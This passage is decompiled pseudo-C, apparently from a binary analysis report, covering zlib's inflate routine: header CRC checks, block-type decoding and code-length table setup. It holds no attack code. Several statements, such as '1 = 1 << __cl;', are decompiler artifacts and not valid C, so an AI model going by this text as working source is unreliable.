                                                                                                                                                              														 *_t188 =  *(__ebx + 0x40) + 1;
                                                                                                                                                              														__eflags =  *_t188;
                                                                                                                                                              														__eax =  *(__ebp - 0x34);
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												_t191 = __ebp - 8; // 0x38
                                                                                                                                                              												__edx =  *_t191;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x2c);
                                                                                                                                                              											if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											L95:
                                                                                                                                                              											__eflags = __eax - __esi;
                                                                                                                                                              											if(__eax < __esi) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										L96:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              										_t196 = __ebp + 8; // 0x38
                                                                                                                                                              										__esi =  *_t196;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              											 *(__ebx + 0x18) = __eax;
                                                                                                                                                              											__eax =  *(__ebp - 0x34);
                                                                                                                                                              										}
                                                                                                                                                              										__ecx =  *(__ebp - 4);
                                                                                                                                                              										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                              										__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                              										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                              										 *(__ebp - 4) = __ecx;
                                                                                                                                                              										if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										} else {
                                                                                                                                                              											L99:
                                                                                                                                                              											goto L102;
                                                                                                                                                              										}
                                                                                                                                                              									case 7:
                                                                                                                                                              										L103:
                                                                                                                                                              										__edx = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              										L104:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                                                                              											L118:
                                                                                                                                                              											__eax =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												 *(__eax + 0x24) = __edx;
                                                                                                                                                              											}
                                                                                                                                                              											L120:
                                                                                                                                                              											__edx =  *(__ebp - 0xc);
                                                                                                                                                              											 *__ebx = 8;
                                                                                                                                                              											goto L121;
                                                                                                                                                              										}
                                                                                                                                                              										L105:
                                                                                                                                                              										__eflags = __ecx;
                                                                                                                                                              										if(__ecx == 0) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L106:
                                                                                                                                                              										__esi =  *(__ebp - 4);
                                                                                                                                                              										__eax = __edx;
                                                                                                                                                              										_t212 = __ebp - 8; // 0x38
                                                                                                                                                              										__edx =  *_t212;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L107:
                                                                                                                                                              											__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                              											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                              											__ecx =  *(__ebx + 0x20);
                                                                                                                                                              											 *(__ebp - 0x34) = __eax;
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx != 0) {
                                                                                                                                                              												__edx =  *(__ecx + 0x24);
                                                                                                                                                              												__eflags =  *(__ecx + 0x24);
                                                                                                                                                              												if( *(__ecx + 0x24) != 0) {
                                                                                                                                                              													__edx =  *(__ebx + 0x40);
                                                                                                                                                              													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                              													if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                              														__ecx =  *(__ecx + 0x24);
                                                                                                                                                              														__eax =  *(__ebp - 0x2c);
                                                                                                                                                              														 *(__ecx + __edx) = __al;
                                                                                                                                                              														_t223 = __ebx + 0x40;
                                                                                                                                                              														 *_t223 =  *(__ebx + 0x40) + 1;
                                                                                                                                                              														__eflags =  *_t223;
                                                                                                                                                              														__eax =  *(__ebp - 0x34);
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												_t226 = __ebp - 8; // 0x38
                                                                                                                                                              												__edx =  *_t226;
                                                                                                                                                              											}
                                                                                                                                                              											__eflags =  *(__ebp - 0x2c);
                                                                                                                                                              											if( *(__ebp - 0x2c) == 0) {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											L113:
                                                                                                                                                              											__eflags = __eax - __esi;
                                                                                                                                                              											if(__eax < __esi) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										L114:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              										_t231 = __ebp + 8; // 0x38
                                                                                                                                                              										__esi =  *_t231;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                              											 *(__ebx + 0x18) = __eax;
                                                                                                                                                              											__eax =  *(__ebp - 0x34);
                                                                                                                                                              										}
                                                                                                                                                              										__ecx =  *(__ebp - 4);
                                                                                                                                                              										 *(__ebp - 8) =  *(__ebp - 8) + __eax;
                                                                                                                                                              										__ecx =  *(__ebp - 4) - __eax;
                                                                                                                                                              										__eflags =  *(__ebp - 0x2c);
                                                                                                                                                              										 *(__ebp - 4) = __ecx;
                                                                                                                                                              										if( *(__ebp - 0x2c) != 0) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										} else {
                                                                                                                                                              											L117:
                                                                                                                                                              											goto L120;
                                                                                                                                                              										}
                                                                                                                                                              									case 8:
                                                                                                                                                              										L121:
                                                                                                                                                              										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                              										if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                                                                              											L129:
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											__eflags = 0;
                                                                                                                                                              											L130:
                                                                                                                                                              											__ecx =  *(__ebx + 0x20);
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx != 0) {
                                                                                                                                                              												 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                                                                              												__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												 *(__ecx + 0x2c) = __eax;
                                                                                                                                                              												__eax =  *(__ebx + 0x20);
                                                                                                                                                              												 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                                                                              											}
                                                                                                                                                              											__eax = E011030C1(__edx, __edx, __edx);
                                                                                                                                                              											 *(__ebx + 0x18) = __eax;
                                                                                                                                                              											 *(__esi + 0x30) = __eax;
                                                                                                                                                              											 *__ebx = 0xb;
                                                                                                                                                              											goto L133;
                                                                                                                                                              										}
                                                                                                                                                              										L122:
                                                                                                                                                              										_push(0x10);
                                                                                                                                                              										_pop(__eax);
                                                                                                                                                              										__eflags = __edi - __eax;
                                                                                                                                                              										if(__edi >= __eax) {
                                                                                                                                                              											L126:
                                                                                                                                                              											__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                                                                              											__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                                                                              											if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                                                                              												L128:
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												__edi = 0;
                                                                                                                                                              												 *(__ebp - 0xc) = 0;
                                                                                                                                                              												 *(__ebp - 0x10) = 0;
                                                                                                                                                              												goto L130;
                                                                                                                                                              											}
                                                                                                                                                              											L127:
                                                                                                                                                              											 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                              											goto L17;
                                                                                                                                                              										}
                                                                                                                                                              										L123:
                                                                                                                                                              										_t246 = __ebp - 8; // 0x38
                                                                                                                                                              										__eax =  *_t246;
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L124:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L125:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											_t249 = __ebp - 8; // 0x38
                                                                                                                                                              											__eax =  *_t249;
                                                                                                                                                              											__eax =  *_t249 + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											 *(__ebp - 0x10) = __edi;
                                                                                                                                                              											__eflags = __edi - 0x10;
                                                                                                                                                              											if(__edi < 0x10) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L126;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 9:
                                                                                                                                                              										L139:
                                                                                                                                                              										__eflags = __edi - 0x20;
                                                                                                                                                              										if(__edi >= 0x20) {
                                                                                                                                                              											L143:
                                                                                                                                                              											__ecx = __edx;
                                                                                                                                                              											__edi = 0xff00;
                                                                                                                                                              											__ecx = __edx & 0x0000ff00;
                                                                                                                                                              											__edx = __edx << 0x10;
                                                                                                                                                              											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                              											__edx = __edx >> 8;
                                                                                                                                                              											__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                              											__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                              											__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                              											__edx = __edx >> 0x18;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__eax = __eax + __edx;
                                                                                                                                                              											 *(__ebx + 0x18) = __eax;
                                                                                                                                                              											 *(__esi + 0x30) = __eax;
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__edx = 0;
                                                                                                                                                              											 *__ebx = 0xa;
                                                                                                                                                              											 *(__ebp - 0xc) = 0;
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											goto L145;
                                                                                                                                                              										}
                                                                                                                                                              										L140:
                                                                                                                                                              										__eax =  *(__ebp - 8);
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L141:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L142:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - 0x20;
                                                                                                                                                              											if(__edi < 0x20) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L143;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 0xa:
                                                                                                                                                              										L144:
                                                                                                                                                              										__eax = 0;
                                                                                                                                                              										__eflags = 0;
                                                                                                                                                              										L145:
                                                                                                                                                              										__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                                                                              										if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                                                                              											L316:
                                                                                                                                                              											__eax =  *(__ebp - 0x1c);
                                                                                                                                                              											 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                              											__eax =  *(__ebp - 0x18);
                                                                                                                                                              											 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											 *__esi =  *(__ebp - 8);
                                                                                                                                                              											 *(__esi + 4) = __ecx;
                                                                                                                                                              											 *(__ebx + 0x38) = __edx;
                                                                                                                                                              											 *(__ebx + 0x3c) = __edi;
                                                                                                                                                              											_push(2);
                                                                                                                                                              											goto L137;
                                                                                                                                                              										}
                                                                                                                                                              										L146:
                                                                                                                                                              										__eax = E01102E91(__eax, __eax, __eax);
                                                                                                                                                              										__edx =  *(__ebp - 0xc);
                                                                                                                                                              										__ecx =  *(__ebp - 4);
                                                                                                                                                              										 *(__ebx + 0x18) = __eax;
                                                                                                                                                              										 *(__esi + 0x30) = __eax;
                                                                                                                                                              										 *__ebx = 0xb;
                                                                                                                                                              										goto L147;
                                                                                                                                                              									case 0xb:
                                                                                                                                                              										L147:
                                                                                                                                                              										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                                                                              										if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L148:
                                                                                                                                                              										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                              										if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										goto L149;
                                                                                                                                                              									case 0xc:
                                                                                                                                                              										L149:
                                                                                                                                                              										__eflags =  *(__ebx + 4);
                                                                                                                                                              										if( *(__ebx + 4) == 0) {
                                                                                                                                                              											L151:
                                                                                                                                                              											__eflags = __edi - 3;
                                                                                                                                                              											if(__edi >= 3) {
                                                                                                                                                              												L155:
                                                                                                                                                              												__eax = __edx;
                                                                                                                                                              												__edx = __edx >> 1;
                                                                                                                                                              												 *(__ebx + 4) = __eax;
                                                                                                                                                              												__edx = __edx & 0x00000003;
                                                                                                                                                              												__eax = __edx & 0x00000003;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													L163:
                                                                                                                                                              													 *__ebx = 0xd;
                                                                                                                                                              													L164:
                                                                                                                                                              													__edx = __edx >> 2;
                                                                                                                                                              													__edi = __edi - 3;
                                                                                                                                                              													L21:
                                                                                                                                                              													 *(_t841 - 0xc) = _t822;
                                                                                                                                                              													 *(_t841 - 0x10) = _t833;
                                                                                                                                                              													goto L134;
                                                                                                                                                              												}
                                                                                                                                                              												L156:
                                                                                                                                                              												__eax = __eax - 1;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													L161:
                                                                                                                                                              													__eax = E01101718(__ebx);
                                                                                                                                                              													 *__ebx = 0x13;
                                                                                                                                                              													__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                              													if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                                                                              														goto L164;
                                                                                                                                                              													}
                                                                                                                                                              													L162:
                                                                                                                                                              													__edx = __edx >> 2;
                                                                                                                                                              													__edi = __edi - 3;
                                                                                                                                                              													 *(__ebp - 0xc) = __edx;
                                                                                                                                                              													goto L322;
                                                                                                                                                              												}
                                                                                                                                                              												L157:
                                                                                                                                                              												__eax = __eax - 1;
                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                              												if(__eax == 0) {
                                                                                                                                                              													_push(0x10);
                                                                                                                                                              													_pop(__eax);
                                                                                                                                                              													 *__ebx = __eax;
                                                                                                                                                              												} else {
                                                                                                                                                              													__eax = __eax - 1;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                              														 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                              														 *__ebx = 0x1d;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												goto L164;
                                                                                                                                                              											}
                                                                                                                                                              											L152:
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L153:
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												if(__ecx == 0) {
                                                                                                                                                              													goto L322;
                                                                                                                                                              												}
                                                                                                                                                              												L154:
                                                                                                                                                              												__eax =  *__eax & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 4) = __ecx;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												__eax = __eax << __cl;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__edx = __eax + __edx;
                                                                                                                                                              												__eax =  *(__ebp - 8);
                                                                                                                                                              												__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												 *(__ebp - 8) = __eax;
                                                                                                                                                              												__eflags = __edi - 3;
                                                                                                                                                              												if(__edi < 3) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												goto L155;
                                                                                                                                                              											}
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L150:
                                                                                                                                                              										__ecx = __edi;
                                                                                                                                                              										 *__ebx = 0x1a;
                                                                                                                                                              										__ecx = __edi & 0x00000007;
                                                                                                                                                              										__edx = __edx >> __cl;
                                                                                                                                                              										__edi = __edi - __ecx;
                                                                                                                                                              										 *(__ebp - 0xc) = __edx;
                                                                                                                                                              										 *(__ebp - 0x10) = __edi;
                                                                                                                                                              										goto L134;
                                                                                                                                                              									case 0xd:
                                                                                                                                                              										goto L0;
                                                                                                                                                              									case 0xe:
                                                                                                                                                              										goto L171;
                                                                                                                                                              									case 0xf:
                                                                                                                                                              										goto L172;
                                                                                                                                                              									case 0x10:
                                                                                                                                                              										L176:
                                                                                                                                                              										__eflags = __edi - 0xe;
                                                                                                                                                              										if(__edi >= 0xe) {
                                                                                                                                                              											L180:
                                                                                                                                                              											__eax = __edx;
                                                                                                                                                              											__edi = __edi - 0xe;
                                                                                                                                                              											__eax = __edx & 0x0000001f;
                                                                                                                                                              											__edx = __edx >> 5;
                                                                                                                                                              											__eax = __eax + 0x101;
                                                                                                                                                              											 *(__ebp - 0x10) = __edi;
                                                                                                                                                              											 *(__ebx + 0x60) = __eax;
                                                                                                                                                              											__eax = __edx;
                                                                                                                                                              											__eax = __edx & 0x0000001f;
                                                                                                                                                              											__edx = __edx >> 5;
                                                                                                                                                              											 *(__ebx + 0x64) = __eax;
                                                                                                                                                              											__eax = __edx;
                                                                                                                                                              											__eax = __edx & 0x0000000f;
                                                                                                                                                              											__edx = __edx >> 4;
                                                                                                                                                              											__eax = __eax + 4;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                                                                              											 *(__ebx + 0x5c) = __eax;
                                                                                                                                                              											if( *(__ebx + 0x60) > 0x11e) {
                                                                                                                                                              												L183:
                                                                                                                                                              												 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                                                                              												goto L31;
                                                                                                                                                              											}
                                                                                                                                                              											L181:
                                                                                                                                                              											__eflags =  *(__ebx + 0x64) - 0x1e;
                                                                                                                                                              											if( *(__ebx + 0x64) > 0x1e) {
                                                                                                                                                              												goto L183;
                                                                                                                                                              											}
                                                                                                                                                              											L182:
                                                                                                                                                              											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                              											_push(0x11);
                                                                                                                                                              											_pop(__eax);
                                                                                                                                                              											 *__ebx = __eax;
                                                                                                                                                              											goto L189;
                                                                                                                                                              										}
                                                                                                                                                              										L177:
                                                                                                                                                              										__eax =  *(__ebp - 8);
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L178:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L179:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - 0xe;
                                                                                                                                                              											if(__edi < 0xe) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L180;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 0x11:
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L189:
                                                                                                                                                              											__eax =  *(__ebx + 0x68);
                                                                                                                                                              											__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                                                                              											if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											L184:
                                                                                                                                                              											__eflags = __edi - 3;
                                                                                                                                                              											if(__edi >= 3) {
                                                                                                                                                              												L188:
                                                                                                                                                              												__eax =  *(__ebx + 0x68);
                                                                                                                                                              												__edx = __edx & 0x00000007;
                                                                                                                                                              												__edx = __edx >> 3;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												__eax =  *(0x1104908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                              												 *((short*)(__ebx + 0x70 + ( *(0x1104908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                              												 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                              												__edi = __edi - 3;
                                                                                                                                                              												__eflags = __edi;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											L185:
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L186:
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												if(__ecx == 0) {
                                                                                                                                                              													goto L322;
                                                                                                                                                              												}
                                                                                                                                                              												L187:
                                                                                                                                                              												__eax =  *__eax & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 4) = __ecx;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												__eax = __eax << __cl;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__edx = __eax + __edx;
                                                                                                                                                              												__eax =  *(__ebp - 8);
                                                                                                                                                              												__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												 *(__ebp - 8) = __eax;
                                                                                                                                                              												__eflags = __edi - 3;
                                                                                                                                                              												if(__edi < 3) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												goto L188;
                                                                                                                                                              											}
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L190:
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L192:
                                                                                                                                                              											__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                                                                              											if( *(__ebx + 0x68) >= 0x13) {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											L191:
                                                                                                                                                              											__eax =  *(__ebx + 0x68);
                                                                                                                                                              											__ecx = 0;
                                                                                                                                                              											__eax =  *(0x1104908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                              											 *((short*)(__ebx + 0x70 + ( *(0x1104908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                              											_t368 = __ebx + 0x68;
                                                                                                                                                              											 *_t368 =  *(__ebx + 0x68) + 1;
                                                                                                                                                              											__eflags =  *_t368;
                                                                                                                                                              										}
                                                                                                                                                              										L193:
                                                                                                                                                              										__eax = __ebx + 0x530;
                                                                                                                                                              										__ecx = __ebx + 0x6c;
                                                                                                                                                              										 *(__ebx + 0x4c) = __eax;
                                                                                                                                                              										 *(__ebx + 0x6c) = __eax;
                                                                                                                                                              										__edx = __ebx + 0x54;
                                                                                                                                                              										__eax = __ebx + 0x2f0;
                                                                                                                                                              										 *(__ebx + 0x54) = 7;
                                                                                                                                                              										__eax = __ebx + 0x70;
                                                                                                                                                              										__eax = E011033B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                              										 *(__ebp - 0x20) = __eax;
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax == 0) {
                                                                                                                                                              											L196:
                                                                                                                                                              											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                              											 *__ebx = 0x12;
                                                                                                                                                              											goto L224;
                                                                                                                                                              										}
                                                                                                                                                              										L194:
                                                                                                                                                              										 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                                                                              										goto L195;
                                                                                                                                                              									case 0x12:
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L224:
                                                                                                                                                              											 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                              											__ecx =  *(__ebx + 0x68);
                                                                                                                                                              											 *(__ebp - 0x2c) = __ecx;
                                                                                                                                                              											__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                              											if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                              												goto L199;
                                                                                                                                                              											} else {
                                                                                                                                                              												break;
                                                                                                                                                              											}
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L199:
                                                                                                                                                              												__ecx =  *(__ebx + 0x54);
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												__eax =  *(__ebx + 0x4c);
                                                                                                                                                              												1 = 1 << __cl;
                                                                                                                                                              												__edx = (1 << __cl) - 1;
                                                                                                                                                              												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                              												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												 *(__ebp - 0x34) = __eax;
                                                                                                                                                              												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                              												if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L197:
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												if(__ecx == 0) {
                                                                                                                                                              													goto L323;
                                                                                                                                                              												}
                                                                                                                                                              												L198:
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												 *(__ebp - 4) = __ecx;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__edx & 0x000000ff) << __cl);
                                                                                                                                                              												 *(__ebp - 8) = __edx;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												__eflags = __edi;
                                                                                                                                                              											}
                                                                                                                                                              											L200:
                                                                                                                                                              											__edx = __eax;
                                                                                                                                                              											_push(0x10);
                                                                                                                                                              											__edx = __eax >> 0x10;
                                                                                                                                                              											_pop(__ecx);
                                                                                                                                                              											__eflags = __dx - __cx;
                                                                                                                                                              											if(__eflags >= 0) {
                                                                                                                                                              												L202:
                                                                                                                                                              												if(__eflags != 0) {
                                                                                                                                                              													L208:
                                                                                                                                                              													__edx =  *(__ebp - 0xc);
                                                                                                                                                              													_push(0x11);
                                                                                                                                                              													_pop(__ecx);
                                                                                                                                                              													__eflags =  *(__ebp - 0x32) - __cx;
                                                                                                                                                              													__ecx = __ah & 0x000000ff;
                                                                                                                                                              													if( *(__ebp - 0x32) != __cx) {
                                                                                                                                                              														L214:
                                                                                                                                                              														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              														while(1) {
                                                                                                                                                              															L215:
                                                                                                                                                              															_t432 = __ecx + 7; // 0x18
                                                                                                                                                              															__eax = _t432;
                                                                                                                                                              															__eflags = __edi - _t432;
                                                                                                                                                              															if(__edi >= _t432) {
                                                                                                                                                              																break;
                                                                                                                                                              															}
                                                                                                                                                              															L216:
                                                                                                                                                              															__ecx =  *(__ebp - 4);
                                                                                                                                                              															__eflags = __ecx;
                                                                                                                                                              															if(__ecx == 0) {
                                                                                                                                                              																goto L323;
                                                                                                                                                              															}
                                                                                                                                                              															L217:
                                                                                                                                                              															__eax =  *(__ebp - 8);
                                                                                                                                                              															 *(__ebp - 4) = __ecx;
                                                                                                                                                              															__ecx = __edi;
                                                                                                                                                              															 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                              															__ecx =  *(__ebp - 0x10);
